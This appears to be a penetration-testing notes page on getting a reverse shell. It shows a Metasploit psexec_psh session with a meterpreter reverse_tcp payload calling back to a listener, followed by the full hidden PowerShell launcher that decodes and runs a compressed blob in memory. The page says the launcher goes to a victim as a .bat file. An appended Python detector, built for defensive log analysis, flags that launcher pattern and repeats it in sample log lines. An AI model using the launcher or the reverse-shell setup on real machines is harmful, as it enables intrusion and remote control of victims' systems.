Open shell via XSS (Internet Explorer)
Even better, open a reverse connection.
> show options
Module options (exploit/windows/smb/psexec_psh):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   DryRun                true             no        Prints the powershell command that would be used
   RHOST                 192.168.21.1     yes       The target address
   RPORT                 445              yes       Set the SMB service port
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             WORKGROUP        no        The Windows domain to use for authentication
   SMBPass                                no        The password for the specified username
   SMBUser                                no        The username to authenticate as

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.71     yes       The listen address
   LPORT     4445             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic
> exploit
[*] Started reverse handler on 192.168.1.71:4445
[+] "%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
The .bat file you make the victim execute is the payload above without the double quotes.
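The launcher printed by psexec_psh above is the part a defender actually sees: a hidden-window, no-profile powershell.exe that hops to the 32-bit binary, base64-decodes and gunzips a blob in memory, and hands it to IEX. The following is an added example (not from the page or from Metasploit) of a small detector that scores process-creation log lines for those features. The log line format ("timestamp parent -> image :: command line"), the sample lines, the indicator names and the threshold of two hits are all assumptions constructed for the example; the base64 blob is replaced by a placeholder.

```python
import re

# Constructed sample process-creation log lines (not real telemetry).
# Line 2 mirrors the psexec_psh launcher from the page with the base64 payload
# replaced by a placeholder; line 3 mirrors the %COMSPEC% wrapper; line 1 is benign.
SAMPLE_LOGS = [
    "2024-01-01T10:00:00Z explorer.exe -> powershell.exe :: powershell.exe -File C:\\scripts\\backup.ps1",
    "2024-01-01T10:00:05Z cmd.exe -> powershell.exe :: powershell.exe -nop -w hidden -c "
    "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};"
    "$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c "
    "$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''<BASE64_PLACEHOLDER>''));"
    "IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';"
    "$s.UseShellExecute=$false;$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",
    "2024-01-01T10:00:09Z services.exe -> cmd.exe :: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c ...",
]

# Indicators taken from the launcher's visible structure. Each alone is weak
# (admins do use -w hidden), so the verdict needs several together.
INDICATORS = {
    "noprofile_hidden": re.compile(r"-nop\b.*-w(?:indowstyle)?\s+hidden", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "gzip_stream": re.compile(r"Compression\.GzipStream", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "syswow64_hop": re.compile(r"syswow64.*powershell\.exe", re.I),
    "comspec_start_min": re.compile(r"start\s+/b\s+/min", re.I),
}

SUSPICIOUS_THRESHOLD = 2  # assumed tuning value, adjust to your environment


def parse_log_line(line):
    """Split the assumed 'ts parent -> image :: cmdline' format into fields."""
    head, _, cmdline = line.partition(" :: ")
    ts, _, lineage = head.partition(" ")
    parent, _, image = lineage.partition(" -> ")
    return {"ts": ts, "parent": parent, "image": image, "cmdline": cmdline}


def analyze(line, threshold=SUSPICIOUS_THRESHOLD):
    """Return the parsed event plus the list of matched indicators and a verdict."""
    event = parse_log_line(line)
    hits = [name for name, rx in INDICATORS.items() if rx.search(event["cmdline"])]
    event["hits"] = hits
    event["verdict"] = "suspicious" if len(hits) >= threshold else "benign"
    return event


def scan(lines, threshold=SUSPICIOUS_THRESHOLD):
    """Analyze every line; returns one result dict per input line, in order."""
    return [analyze(line, threshold) for line in lines]


if __name__ == "__main__":
    for r in scan(SAMPLE_LOGS):
        print(f"{r['ts']} {r['parent']} -> {r['image']}: {r['verdict']} {r['hits']}")
```

The useful part for detection engineering is the combination: a hidden no-profile PowerShell that also decodes base64, inflates a GZip stream and pipes the result into IEX matches this launcher regardless of what the base64 blob contains, so the rule does not depend on the payload bytes changing between runs.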